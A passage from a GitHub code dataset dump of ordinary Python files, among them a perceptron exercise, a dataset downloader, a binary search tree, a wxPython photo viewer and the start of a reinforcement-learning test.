1D array, weights for each element in X. \n b: int, bias unit \n learn_rate: float, learning rate to be used at each perceptron step. optional. Default: 0.01\n '''\n\n for Xi, Yi in zip(X, y):\n y_hat = prediction(Xi, W, b)\n if y_hat == Yi:\n pass\n elif y_hat == 0:\n W[0] -= learn_rate * Xi[0]\n W[1] -= learn_rate * Xi[1]\n b = b + learn_rate\n elif y_hat == 1: \n W[0] -= learn_rate * Xi[0]\n W[1] -= learn_rate * Xi[1]\n b = b - learn_rate\n return W, b\n \ndef trainPerceptronAlgorithm(X, y, learn_rate = 0.01, num_epochs = 50):\n '''\n trainPerceptronAlgorithm runs the perceptron algorithm repeatedly on the dataset\n returns boundary lines obtained in the iterations\n\n parameters: \n -----------\n X: 1D numpy array with tuples: (x1, x2) representing the features \n y: 1D numpy array representing the labels \n learn_rate: float, optional. learning rate at which the perceptron step will be applied \n num_epochs: int, optional. Number of epochs to train the perceptron algorithm\n\n returns:\n boundary_lines: array with the tuple of coordinates to plot\n '''\n x_min, x_max = min(X.T[0]), max(X.T[0])\n y_min, y_max = min(X.T[1]), max(X.T[1])\n W = np.random.rand(2,1)\n b = np.random.rand(1)[0] + x_max\n # These are the solution lines that get plotted below.\n boundary_lines = []\n for i in range(num_epochs):\n # In each epoch, we apply the perceptron step.\n W, b = perceptronStep(X, y, W, b, learn_rate)\n boundary_lines.append((-W[0]/W[1], -b/W[1]))\n if i < num_epochs-1:\n display(-W[0]/W[1], -b/W[1])\n return boundary_lines\n\ndef build_arrays(filename):\n '''\n build_arrays will read a csv file with the inputs X and labels y and return a tuple of numpy arrays\n\n parameters:\n -----------\n filename: string, file containing the dataset to evaluate on\n\n returns: \n tuple, numpy arrays, representing inputs and labels \n '''\n data_frame = pd.read_csv(filename, names=[\"x1\", \"x2\", \"y\"])\n X = data_frame[[\"x1\", \"x2\"]].to_numpy()\n y = data_frame[[\"y\"]].to_numpy()\n return X,y \n\nif __name__ == \"__main__\":\n\n # Setting the random seed, feel free to change it and see different solutions.\n np.random.seed(42)\n\n X,y = build_arrays(\"data.csv\")\n\n num_epochs = 50\n lines = trainPerceptronAlgorithm(X, y)\n\n plt.title(\"Solution boundary\")\n display(lines[num_epochs-1][0][0],lines[num_epochs-1][1][0], 'black','-')\n\n # plot the points \n plot_points(X,y)\n plt.show()\n\n\n\n\n\n\n","repo_name":"laurauzcategui/deep_learning_nanodegree","sub_path":"neural_networks/l1_intro_to_neural_nets/3_10_perceptron.py","file_name":"3_10_perceptron.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"12405709337","text":"from drf_yasg import openapi\n\nfrom .serializers import ResultSerializer, BuySellSerializer, ConditionInfoSerializer, DayHistorySerialilzer, YearHistorySerialilzer\n\nrest_framework_openapi_field_mapping = {\n \"EmailField\": openapi.TYPE_STRING,\n \"ImageField\": openapi.TYPE_STRING,\n \"ListField\": openapi.TYPE_ARRAY,\n \"CharField\": openapi.TYPE_STRING,\n \"TextField\": openapi.TYPE_STRING,\n \"BooleanField\": openapi.TYPE_BOOLEAN,\n \"FloatField\": openapi.TYPE_NUMBER,\n \"DateTimeField\": openapi.TYPE_STRING,\n \"IntegerField\": openapi.TYPE_INTEGER,\n \"SerializerMethodField\": openapi.TYPE_STRING,\n \"BigIntegerField\": openapi.TYPE_INTEGER\n}\n\ndef parse_rest_framework_field(field):\n rest_framework_field_type = field.split(\"(\")[0]\n openapi_field_type = rest_framework_openapi_field_mapping[rest_framework_field_type]\n if \"help_text=\" in field:\n field_description = field.split(\"help_text='\")[-1].split(\"'\")[0]\n else:\n field_description = None\n return openapi.Schema(type=openapi_field_type, description=field_description)\n\ndef parse_serializer(name):\n properties = {}\n \n if name == \"result\":\n serializer = ResultSerializer()\n elif name == \"buysell\":\n serializer = BuySellSerializer()\n elif name == \"condition\":\n serializer = ConditionInfoSerializer()\n elif name == \"day\":\n serializer = DayHistorySerialilzer()\n elif name == \"year\":\n serializer = YearHistorySerialilzer() \n \n for k,v in serializer.get_fields().items():\n if v.__module__ == \"rest_framework.fields\":\n properties[k] = parse_rest_framework_field(str(v))\n elif v.__module__.startswith(\"apps.\"):\n serializer = str(v).strip().split(\"(\")[0]\n exec(f\"from {v.__module__} import {serializer}\")\n eval_serializer = eval(f\"{serializer}()\")\n properties[k] = openapi.Schema(type=openapi.TYPE_OBJECT, properties=parse_serializer(eval_serializer))\n else:\n pass\n return properties\n\ndef get_serializer(name, description):\n \"\"\" Needs to return openapi.Schema() \"\"\"\n properties = parse_serializer(name)\n return_openapi_schema = openapi.Schema(type=openapi.TYPE_OBJECT, properties=properties, description=description)\n return return_openapi_schema","repo_name":"Hasky96/JRStock","sub_path":"backend/backtest/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"15170206027","text":"import sys\nimport os\nimport subprocess\n\nimport igraph as ig\n\nfrom biomap import BioMap\nfrom deregnet.core import SubgraphFinder\n\nsys.path.append('.')\n\nfrom utils import get_rnaseq_score, get_rnaseq_score_for_patient, get_vogelstein\n\ndef main(argv):\n dataset = argv[1]\n graph_path = 'graphs/kegg_hsa_paper.graphml'\n if len(argv) > 2:\n graph_path = argv[2]\n #\n id_mapper = BioMap.get_mapper('hgnc')\n rnaseq_score = get_rnaseq_score(dataset, normalize_wrt='genewise_median')\n rnaseq_score.index = [gene.split('.')[0] for gene in rnaseq_score.index]\n rnaseq_score.index = list(id_mapper.map(list(rnaseq_score.index), FROM='ensembl', TO='entrez'))\n patients = list(rnaseq_score.columns)\n failed = []\n base_path = os.path.join('mode4', dataset)\n vogelstein = id_mapper.map(get_vogelstein(), FROM='symbol', TO='entrez')\n vogelstein = [gene for gene in vogelstein if gene]\n if not os.path.isdir(base_path):\n os.makedirs(base_path)\n for patient_id in patients:\n path = os.path.join(base_path, patient_id)\n nodes_already = set()\n i = 0\n for graphml in os.listdir(path):\n if not graphml.endswith('.graphml'):\n continue\n i += 1\n gf = os.path.join(path, graphml)\n G = ig.Graph.Read_GraphML(gf)\n nodes_already = nodes_already.union({v['name'] for v in G.vs})\n\n graph = ig.Graph.Read_GraphML(graph_path)\n graph.delete_vertices(graph.vs.select(name_in=nodes_already))\n finder = SubgraphFinder(graph)\n score = get_rnaseq_score_for_patient(patient_id, rnaseq_score)\n try:\n result = finder.run_average_deregnet(score,\n min_size=10,\n gap_cut=0.05,\n time_limit=1200,\n abs_values=True,\n receptors=vogelstein,\n terminals=vogelstein)\n except:\n failed.append(patient_id)\n path = os.path.join(path, 'suboptimal_'+str(i)+'.graphml')\n try:\n result.optimal.write_graphml(path)\n except:\n failed.append(patient_id)\n with open(os.path.join(base_path, 'failed.txt'), 'w') as fp:\n for fail in failed:\n fp.write(fail+'\\n')\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"sebwink/deregnet-tcga","sub_path":"old/aposteriori_suboptimal_mode4_uvm.py","file_name":"aposteriori_suboptimal_mode4_uvm.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"42291157419","text":"\nimport numpy as np\nimport pandas as pd\nimport os, copy\nimport joblib\nimport skfuzzy as fuzz\n\nclass clusterer(object):\n\n def __init__(self, fuzzy_path, fuzzy_file, type):\n self.fuzzy_file = os.path.join(fuzzy_path, fuzzy_file)\n fmodel = joblib.load(self.fuzzy_file)\n self.rules = fmodel['rules']\n if type == 'pv':\n self.p = 4\n elif type == 'wind':\n self.p = 3\n elif type == 'load':\n self.p = 4\n elif type == 'fa':\n self.p = 3\n\n def compute_activations(self, X):\n activations = pd.DataFrame(index=X.index, columns=[i for i in sorted(self.rules.keys())])\n var_del = []\n for rule in sorted(self.rules.keys()):\n act = []\n for mf in self.rules[rule]:\n if mf['var_name'] not in X.columns:\n var_names = [c for c in X.columns if mf['var_name'] in c]\n X[mf['var_name']] = X[var_names].mean(axis=1)\n var_del.append(mf['var_name'])\n act.append(fuzz.interp_membership(mf['universe'], mf['func'], X[mf['var_name']]))\n activations[rule] = np.power(np.prod(np.array(act), axis=0), 1 / self.p)\n if len(var_del) > 0:\n X = X.drop(columns=var_del)\n return activations\n","repo_name":"joesider9/forecasting_library","sub_path":"Fuzzy_clustering/ver_tf2/Clusterer.py","file_name":"Clusterer.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"22940698910","text":"import random\n\ndef playersPoint():\n if(userCount>0 or compCount>0):\n print(\"User Points:\",userCount)\n print(\"Comp Points:\",compCount)\n else:\n print(\"User Points:\",userCount)\n print(\"Comp Points:\",compCount)\n\ndef roundResult():\n if userCount == compCount:\n print(\" ROUND DRAW \")\n elif userCount>compCount:\n print(\" USER WON THE ROUND \")\n else:\n print(\" COMPUTER WON THE ROUND \\n\")\n\ndef mainResult():\n if userCount == compCount:\n print(\" MATCH DRAW \")\n elif userCount>compCount:\n print(\" USER WON THE MATCH \")\n else:\n print(\" COMPUTER WON THE MATCH \\n\")\n\ndef playAgain(): \n print(\"\\n************************ THANKS FOR PLAYING GAME ********************\")\n print()\n \n\nchoice = \"y\"\nuserCount = 0\ncompCount = 0\nwhile choice == \"y\":\n list = [\"r\", \"p\", \"s\"]\n compChoice = random.choice(list) \n print(\"******************************************* CODED BY HARSHAD JOSHI *******************************************\", end = \"\\n\\n\")\n print(\"**************************************** STONE | PAPER | SCISSOR GAME ****************************************\", end = \"\\n\\n\")\n\n userChoise = input(\"OPTIONS:\\n 1. Rock as (r)\\n 2. Paper as (p)\\n 3. Scissor as (s)\\n\\nChoose any one among three: \")\n print(\"\\n\")\n\n if userChoise==\"s\" or userChoise==\"p\" or userChoise==\"r\":\n print(f\"User has choosen: {userChoise}\")\n print(f\"Computer has choosen: {compChoice}\", end = \"\\n\\n\")\n\n if compChoice == \"s\" and userChoise == \"p\":\n compCount += 2\n elif compChoice == \"p\" and userChoise == \"s\":\n userCount += 2\n elif compChoice == \"r\" and userChoise == \"p\":\n userCount += 2\n elif compChoice == \"p\" and userChoise == \"r\":\n compCount += 2\n elif compChoice == \"r\" and userChoise == \"s\":\n compCount += 2\n elif compChoice == \"s\" and userChoise == \"r\":\n userCount += 2\n elif((compChoice == \"s\" and userChoise == \"s\") or (compChoice == \"p\" and userChoise == \"p\") or (compChoice == \"r\" and userChoise == \"r\")):\n userCount += 1\n compCount += 1\n\n roundResult()\n print()\n playersPoint()\n print()\n choice = input('''To play again press \"y\" otherwise press any key: ''')\n print()\n mainResult()\n playAgain() \n else:\n print(\"Choose correct option as given above!\\n\")\n choice = input('''To play again press \"y\" otherwise press any key: ''') \n print()\n mainResult()\n playAgain() ","repo_name":"Harshad-Joshi1/RPS_Game","sub_path":"stone_paper_scissor.py","file_name":"stone_paper_scissor.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15700856950","text":"import argparse\nimport os\nimport requests\nimport sys\nimport typing\n\nimport h5py\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom structsiren.datasets.shapes3d import URL, H5, SERIES\n\n\ndef _download(url: str, filename: str):\n r\"\"\"Download content at `url` to `filename`.\"\"\"\n print(f'downloading from {url} to {filename}')\n\n with open(filename, 'wb') as f:\n response = requests.get(url, stream=True)\n total = response.headers.get('content-length')\n\n if total is None:\n f.write(response.content)\n else:\n downloaded = 0\n total = int(total)\n for data in response.iter_content(\n chunk_size=max(int(total / 1000), 1024 * 1024)):\n downloaded += len(data)\n f.write(data)\n done = int(50 * downloaded / total)\n sys.stdout.write(\n '\\r[{}{}]'.format('█' * done, '.' * (50 - done)))\n sys.stdout.flush()\n sys.stdout.write('\\n')\n\n\ndef _cache_3d_shapes(\n cache_root: str,\n *,\n h5: typing.Optional[str] = None,\n download: bool = False\n):\n r\"\"\"Cache corpus of 3D-Shapes.\n\n Args:\n cache_root: folder to save images to\n h5: file with images\n download: option whether to download data if not available\n\n \"\"\"\n cache_root = os.path.abspath(os.path.expanduser(cache_root))\n if not os.path.exists(cache_root):\n os.mkdir(cache_root)\n\n if not h5:\n h5 = os.path.abspath(os.path.expanduser(H5))\n\n if not os.path.exists(h5):\n if not download:\n raise RuntimeError(\n f'h5 file not available at `{h5}`, '\n f'yet, download disabled.')\n\n _download(URL, h5)\n\n with h5py.File(h5, \"r\") as f:\n images = np.array(f['images'])\n labels = np.array(f['labels'])\n\n filenames = []\n\n for i, img in tqdm(\n enumerate(images),\n desc='Cache 3D-Shapes',\n total=images.shape[0]\n ):\n fname = os.path.join(cache_root, f'{str(i).zfill(5)}_img.npy')\n filenames.append(fname)\n np.save(fname, arr=img)\n\n series = pd.Series(data=labels.tolist(), index=filenames)\n series.to_pickle(\n os.path.join(cache_root, SERIES),\n compression='xz'\n )\n\n\ndef main(args: argparse.Namespace):\n\n _cache_3d_shapes(\n cache_root=args.cache_root,\n h5=args.h5,\n download=args.download\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n 'cache_root',\n type=str,\n help='path to folder where 3dshape content '\n 'should be stored'\n )\n\n parser.add_argument(\n '--h5',\n type=str,\n help='path to h5-file with 3dshape content. '\n f'If not specified, it is downloaded if '\n f'download option is activated',\n default=''\n )\n\n parser.add_argument(\n '--download',\n action='store_true',\n help='option whether to download `h5` file if not available'\n )\n\n main(parser.parse_args())\n","repo_name":"phtephanx/structsiren","sub_path":"scripts/3dshapes_prepare_data.py","file_name":"3dshapes_prepare_data.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26041843798","text":"class Node(object):\n def __init__(self, value: int) -> None:\n self.value = value\n self.left = None\n self.right = None\n\ndef insert(node: Node, value: int) -> Node:\n if node is None:\n return Node(value)\n\n if value < node.value:\n node.left = insert(node.left, value) \n else:\n node.right = insert(node.right, value)\n return node\n\ndef inOrder(node: Node) -> None:\n if node is not None:\n inOrder(node.left)\n print(node.value)\n inOrder(node.right)\n return \n\ndef search(node: Node, value) -> bool:\n if node is None:\n return False\n\n if value == node.value:\n return True\n elif value < node.value:\n return search(node.left, value)\n else:\n return search(node.right, value)\n\ndef min_val(node: Node) -> None:\n current = node\n if current.left is None:\n return current\n return min_val(current.left) \n\ndef remove(node: Node, value:int) -> None:\n if node is None:\n return node\n\n if value < node.value:\n node.left = remove(node.left, value)\n elif value > node.value:\n node.right = remove(node.right, value)\n else:\n if node.left is None:\n return node.right\n elif node.right is None:\n return node.left\n\n temp = min_val(node.right)\n node.value = temp.value\n node.right = remove(node.right, temp.value) \n return node \n\nroot = None\nroot = insert(root, 3)\nroot = insert(root, 6)\nroot = insert(root, 5) \nroot = insert(root, 7) \nroot = insert(root, 1) \nroot = insert(root, 10) \nroot = insert(root, 2) \nroot = remove(root, 6)\ninOrder(root)","repo_name":"Kotarosz727/python-algorism","sub_path":"binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8868235510","text":"import wx\nimport os\nimport sys\nimport datetime\nimport Model\nimport Utils\nimport PhotoFinish\nimport VideoBuffer\n\ndef getRiderName( info ):\n\tlastName = info.get('LastName','')\n\tfirstName = info.get('FirstName','')\n\tif lastName:\n\t\tif firstName:\n\t\t\treturn '%s, %s' % (lastName, firstName)\n\t\telse:\n\t\t\treturn lastName\n\treturn firstName\n\t\ndef getTitle( num, t ):\n\tif not num:\n\t\treturn ''\n\t\t\n\ttry:\n\t\texternalInfo = Model.race.excelLink.read()\n\texcept Exception:\n\t\tname = str(num)\n\telse:\n\t\tinfo = externalInfo.get(num, {})\n\t\tname = getRiderName( info )\n\t\tif info.get('Team', ''):\n\t\t\tname = '%d: %s (%s)' % (num, name, info.get('Team', '').strip())\n\t\t\t\n\tname = '%s - %s' % (name, Utils.formatTime(t, True))\n\treturn name\n\ndef RescaleImage( image, width, height ):\n\tbWidth, bHeight = image.GetWidth(), image.GetHeight()\n\t# Keep the same aspect ratio.\n\tar = float(bHeight) / float(bWidth)\n\tif width * ar > height:\n\t\twidth = height / ar\n\timage.Rescale( int(width), int(height), wx.IMAGE_QUALITY_NORMAL )\n\treturn image\n\t\ndef RescaleBitmap( dc, bitmap, width, height ):\n\tbWidth, bHeight = bitmap.GetWidth(), bitmap.GetHeight()\n\t# Keep the same aspect ratio.\n\tar = float(bHeight) / float(bWidth)\n\tif width * ar > height:\n\t\twidth = height / ar\n\timage = bitmap.ConvertToImage()\n\timage.Rescale( int(width), int(height), wx.IMAGE_QUALITY_HIGH )\n\tif dc.GetDepth() == 8:\n\t\timage = image.ConvertToGreyscale()\n\treturn image.ConvertToBitmap()\n\t\nclass PhotoSyncViewerDialog( wx.Dialog ):\n\tdef __init__(\n\t\t\tself, parent, ID = wx.ID_ANY, title=_('Photo Sync Previewer'), size=wx.DefaultSize, pos=wx.DefaultPosition, \n\t\t\tstyle=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER ):\n\n\t\tsuper().__init__(parent, ID, title, pos, size, style)\n\n\t\t# This next step is the most important, it turns this Python\n\t\t# object into the real wrapper of the dialog (instead of pre)\n\t\t# as far as the wxPython extension is concerned.\n\t\tself.PostCreate(pre)\n\t\t\n\t\tself.timeFrames = []\n\n\t\tself.vbs = wx.BoxSizer(wx.VERTICAL)\n\t\t\n\t\tself.title = wx.StaticText( self, style=wx.ALIGN_LEFT )\n\t\tself.title.SetFont( wx.Font( (0,24), wx.FONTFAMILY_SWISS, wx.NORMAL, wx.FONTWEIGHT_NORMAL ) )\n\t\t\n\t\tself.captureButton = wx.ToggleButton( self, label = _('Reset Photo Capture') )\n\t\tself.captureButton.Bind( wx.EVT_TOGGLEBUTTON, self.OnCapture )\n\t\tself.captureCount = 0\n\t\t\n\t\tself.scrolledWindow = wx.ScrolledWindow( self )\n\t\tself.numPhotoSeries = 4\n\t\tself.numPhotos = 18\n\t\tself.iSeries = 0\n\t\tself.photoWidth, self.photoHeight = int(2 * 320 / 4), int(2 * 240 / 4)\n\t\tself.hgap = 4\n\t\tgs = wx.FlexGridSizer( rows = 2 * self.numPhotoSeries, cols = self.numPhotos, hgap = self.hgap, vgap = 4 )\n\t\tbitmap = wx.Bitmap( os.path.join(Utils.getImageFolder(), 'CrossMgrSplash.png'), wx.BITMAP_TYPE_PNG )\n\t\tself.bitmap = RescaleBitmap( wx.WindowDC(self), bitmap, self.photoWidth, self.photoHeight )\n\t\t\n\t\tself.photoBitmaps = [[wx.BitmapButton(\n\t\t\t\t\t\t\t\t\tself.scrolledWindow,\n\t\t\t\t\t\t\t\t\tlabel=self.bitmap, size=(self.photoWidth+4,self.photoHeight+4),\n\t\t\t\t\t\t\t\t\tstyle=wx.BU_AUTODRAW)\n\t\t\t\t\t\t\t\tfor i in range(self.numPhotos)] for s in range(self.numPhotoSeries)]\n\t\tself.photoLabels = [[wx.StaticText(self.scrolledWindow, style=wx.ALIGN_CENTRE) for i in range(self.numPhotos)]\n\t\t\t\t\t\t\t\tfor s in range(self.numPhotoSeries)]\n\t\tself.titles = [''] * self.numPhotoSeries\n\t\tfor s in range(self.numPhotoSeries):\n\t\t\tfor i, p in enumerate(self.photoLabels[s]):\n\t\t\t\tp.SetLabel( str(i) )\n\t\t\tfor i, w in enumerate(self.photoBitmaps[s]):\n\t\t\t\tw.Bind( wx.EVT_BUTTON, lambda event, s = s, i = i: self.OnBitmapButton(event, s, i) )\n\t\t\t\tw.Bind( wx.EVT_MOTION, lambda event, s = s, i = i: self.OnMouseMove(event, s, i) )\n\t\t\tgs.AddMany( (w,0,) for w in self.photoBitmaps[s] )\n\t\t\tgs.AddMany( (w,1,wx.ALIGN_CENTER_HORIZONTAL) for w in self.photoLabels[s] )\n\t\t\n\t\tself.scrolledWindow.SetSizer( gs )\n\t\tself.scrolledWindow.Fit()\n\t\twidth, height = self.scrolledWindow.GetBestSize()\n\t\tself.scrolledWindow.SetVirtualSize( (width, height) )\n\t\tself.scrolledWindow.SetScrollRate( 20, 20 )\n\t\tself.scrolledWindow.SetScrollbars( 1, 1, width, height )\n\t\t\n\t\twx.CallAfter( self.ScrollToPicture, self.numPhotos // 2 )\n\t\t\n\t\thb = wx.BoxSizer( wx.HORIZONTAL )\n\t\thb.Add( self.title, 1, flag=wx.ALL, border = 2 )\n\t\thb.Add( self.captureButton, 0, flag=wx.ALL|wx.ALIGN_RIGHT, border = 2 )\n\t\tself.vbs.Add( hb, 0, wx.EXPAND )\n\t\tself.vbs.Add( self.scrolledWindow, 1, wx.EXPAND )\n\t\t\n\t\tself.SetSizer( self.vbs )\n\t\t\n\t\tdisplayWidth, displayHeight = wx.GetDisplaySize()\n\t\tself.SetSize( (int(displayWidth * 0.75), min(height + 80, int(wx.GetDisplaySize()[1] * 0.9))) )\n\t\tself.vbs.Layout()\n\t\t\n\t\tself.clear()\n\n\tdef OnCapture( self, event ):\n\t\tif self.captureButton.GetValue():\n\t\t\tself.reset()\n\t\t\t\n\tdef reset( self ):\n\t\tself.captureCount = 0\n\t\tself.iSeries = 0\n\t\tself.captureButton.SetValue( True )\n\t\tself.clear()\n\t\t\n\tdef OnMouseMove( self, event, s, i ):\n\t\tself.title.SetLabel( self.titles[s] )\n\t\t\n\tdef OnBitmapButton( self, event, s, i ):\n\t\tlabel = self.photoLabels[s][i].GetLabel()\n\t\tfields = label.split()\n\t\tif len(fields) < 1:\n\t\t\treturn\n\t\tmilliseconds = fields[0]\n\t\tif milliseconds and Model.race:\n\t\t\tModel.race.advancePhotoMilliseconds = int( milliseconds )\n\t\t\tUtils.MessageOK( self, '{} {}'.format(_('Advance/Delay Photo Milliseconds set to'), milliseconds), _('Advance/Delay Milliseconds') )\n\t\t\n\tdef OnClose( self, event ):\n\t\tself.Show( False )\n\t\t\n\tdef ScrollToPicture( self, iPicture ):\n\t\txScroll = 0\n\t\tfor i, b in enumerate(self.photoBitmaps[self.iSeries]):\n\t\t\tif i == iPicture:\n\t\t\t\tbreak\n\t\t\txScroll += b.GetSize().GetWidth() + self.hgap\n\t\tself.scrolledWindow.Scroll( xScroll / self.scrolledWindow.GetScrollPixelsPerUnit()[0], -1 )\n\t\t\t\n\tdef clear( self ):\n\t\tself.timeFrames = []\n\t\tself.titles = [''] * self.numPhotoSeries\n\t\tfor s in range(self.numPhotoSeries):\n\t\t\tfor w in self.photoBitmaps[s]:\n\t\t\t\tw.SetBitmapLabel( self.bitmap )\n\t\t\tfor w in self.photoLabels[s]:\n\t\t\t\tw.SetLabel( '' )\n\t\t\n\tdef refresh( self, videoBuffer, t, num = None ):\n\t\tif not videoBuffer:\n\t\t\tfor s in range(len(self.photoLabels)):\n\t\t\t\tfor i in range(len(self.photoLabels[s])):\n\t\t\t\t\tself.photoBitmaps[s][i].SetBitmapLabel( self.bitmap )\n\t\t\t\t\tself.photoLabels[s][i].SetLabel( '' )\n\t\t\treturn\n\t\n\t\tif not self.captureButton.GetValue():\n\t\t\treturn\n\t\n\t\ttCur = videoBuffer.refTime + datetime.timedelta( seconds = t )\n\t\ttimeFrames = videoBuffer.findBeforeAfter( t, self.numPhotos // 2, self.numPhotos // 2, 60.0*60.0 )\n\t\tdeltaMS = [((tFrame - tCur).total_seconds() * 1000.0) for tFrame, frame in timeFrames]\n\t\t\n\t\tif len(timeFrames) < self.numPhotos:\n\t\t\td = self.numPhotos - len(timeFrames)\n\t\t\ttimeFrames = ([(None, None)] * d) + timeFrames\n\t\t\tdeltaMS = ([None] * d) + deltaMS\n\t\t\n\t\tphotoLabels = self.photoLabels[self.iSeries]\n\t\tphotoBitmaps = self.photoBitmaps[self.iSeries]\n\t\t\n\t\tdeltaMin = sys.float_info.max\n\t\tiMin = 0\n\t\tdc = wx.WindowDC( self )\n\t\tfor i, (tFrame, frame) in enumerate(timeFrames):\n\t\t\tif deltaMS[i] is not None and abs(deltaMS[i]) < deltaMin:\n\t\t\t\tdeltaMin = abs(deltaMS[i])\n\t\t\t\tiMin = i\n\t\t\tif deltaMS[i] is None:\n\t\t\t\tphotoLabels[i].SetLabel( '' )\n\t\t\t\tphotoBitmaps[i].SetBitmapLabel( wx.NullBitmap )\n\t\t\telse:\n\t\t\t\tphotoLabels[i].SetLabel( '{}ms'.format(deltaMS[i]) )\n\t\t\t\timage = PhotoFinish.PilImageToWxImage( frame )\n\t\t\t\timage = RescaleImage( image, self.photoWidth, self.photoHeight )\n\t\t\t\tbitmap = image.ConvertToBitmap()\n\t\t\t\tphotoBitmaps[i].SetBitmapLabel( bitmap )\n\n\t\tself.titles[self.iSeries] = getTitle( num, t )\n\t\tself.title.SetLabel( self.titles[self.iSeries] )\n\t\t\n\t\tself.Refresh()\n\t\t\n\t\tself.iSeries = (self.iSeries + 1) % self.numPhotoSeries\n\t\t\n\t\tself.captureCount += 1\n\t\tif self.captureCount >= self.numPhotoSeries:\n\t\t\tself.captureButton.SetValue( False )\n\t\t\t\t\nphotoSyncViewer = None\ndef PhotoSyncViewerShow( parent ):\n\tglobal photoSyncViewer\n\tif not photoSyncViewer:\n\t\tphotoSyncViewer = PhotoSyncViewerDialog( parent, title = _(\"Photo Sync Viewer\") )\n\tphotoSyncViewer.reset()\n\tphotoSyncViewer.Show( True )\n\t\ndef PhotoSyncViewerIsShown():\n\tglobal photoSyncViewer\n\treturn photoSyncViewer and photoSyncViewer.IsShown()\n\t\ndef PhotoSyncViewerHide():\n\tif not photoSyncViewer:\n\t\treturn\n\tphotoSyncViewer.Show( False )\n\tphotoSyncViewer.clear()\n\ndef StartPhotoSyncViewer( parent ):\n\tPhotoSyncViewerShow( parent )\n\t\ndef Shutdown():\n\tPhotoSyncViewerHide()\n\nif __name__ == '__main__':\n\timport time\n\timport shutil\n\t\n\trace = Model.newRace()\n\trace._populate()\n\n\tapp = wx.App(False)\n\t\n\tdirName = 'VideoBufferTest_Photos'\n\tif os.path.isdir(dirName):\n\t\tshutil.rmtree( dirName, True )\n\tos.mkdir( dirName )\n\t\n\ttRef = datetime.datetime.now()\n\tcamera = PhotoFinish.SetCameraState( True )\n\tvb = VideoBuffer.VideoBuffer( camera, tRef, dirName )\n\tvb.start()\n\ttime.sleep( 1.0 )\n\t\n\tmainWin = wx.Frame(None, title=\"CrossMan\", size=(600,400))\n\tmainWin.Show()\n\tphotoSyncDialog = PhotoSyncViewerDialog( mainWin, title = \"PhotoSyncViewer\", size=(600,400) )\n\tdef doRefresh( bib ):\n\t\tt = (datetime.datetime.now() - tRef).total_seconds()\n\t\twx.CallLater( 300, photoSyncDialog.refresh, vb, t, bib )\n\t\t\n\tphotoSyncDialog.Show()\n\tphotoSyncDialog.reset()\n\tbib = 100\n\tfor d in range(0, 1000*60, 1000):\n\t\twx.CallLater( max(1,d), doRefresh, bib )\n\t\tbib += 1\n\tapp.MainLoop()\n","repo_name":"esitarski/CrossMgr","sub_path":"PhotoSyncViewer.py","file_name":"PhotoSyncViewer.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"85"} +{"seq_id":"24673139517","text":"import logging\nimport socket\nimport sys\n\nlock_socket = None\n\ndef is_lock_free():\n global lock_socket\n lock_socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n try:\n lock_id = \"my-username.my-task-name\" # this should be unique. using your username as a prefix is a convention\n lock_socket.bind('\\0' + lock_id)\n logging.debug(\"Acquired lock %r\" % (lock_id,))\n return True\n except socket.error:\n logging.info(\"Failed to acquire lock %r\" % (lock_id,))\n return False\n \nif not is_lock_free():\n sys.exit()\nfrom my_module import my_long_running_process\nmy_long_running_process()\n","repo_name":"okwow123/finaltest","sub_path":"longrunning.py","file_name":"longrunning.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40109744960","text":"import logging\nimport os\nimport tempfile\nimport warnings\n\nimport numpy as np\nimport pytest\nimport torch\nfrom torch import nn\n\nimport pfrl\nfrom pfrl.agents import a3c\nfrom pfrl.envs.abc import ABC\nfrom pfrl.experiments.evaluator import run_evaluation_episodes\nfrom pfrl.experiments.train_agent_async import train_agent_async\nfrom pfrl.nn import RecurrentBranched, RecurrentSequential\nfrom pfrl.policies import (\n GaussianHeadWithStateIndependentCovariance,\n SoftmaxCategoricalHead,\n)\n\n\nclass _TestA3C:\n @pytest.fixture(autouse=True)\n def setUp(self):\n self.outdir = tempfile.mkdtemp()\n logging.basicConfig(level=logging.DEBUG)\n\n @pytest.mark.async_\n @pytest.mark.slow\n def test_abc(self):\n self._test_abc(\n self.t_max,\n recurrent=self.recurrent,\n episodic=self.episodic,\n discrete=self.discrete,\n )\n\n @pytest.mark.async_\n def test_abc_fast(self):\n self._test_abc(\n self.t_max,\n recurrent=self.recurrent,\n episodic=self.episodic,\n discrete=self.discrete,\n steps=10,\n require_success=False,\n )\n\n def make_model(self, env):\n hidden_size = 20\n obs_size = env.observation_space.low.size\n\n def weight_scale(layer, scale):\n with torch.no_grad():\n layer.weight.mul_(scale)\n return layer\n\n if self.recurrent:\n v = RecurrentSequential(\n nn.LSTM(num_layers=1, input_size=obs_size, hidden_size=hidden_size),\n weight_scale(nn.Linear(hidden_size, 1), 1e-1),\n )\n if self.discrete:\n n_actions = env.action_space.n\n pi = RecurrentSequential(\n nn.LSTM(num_layers=1, input_size=obs_size, hidden_size=hidden_size),\n 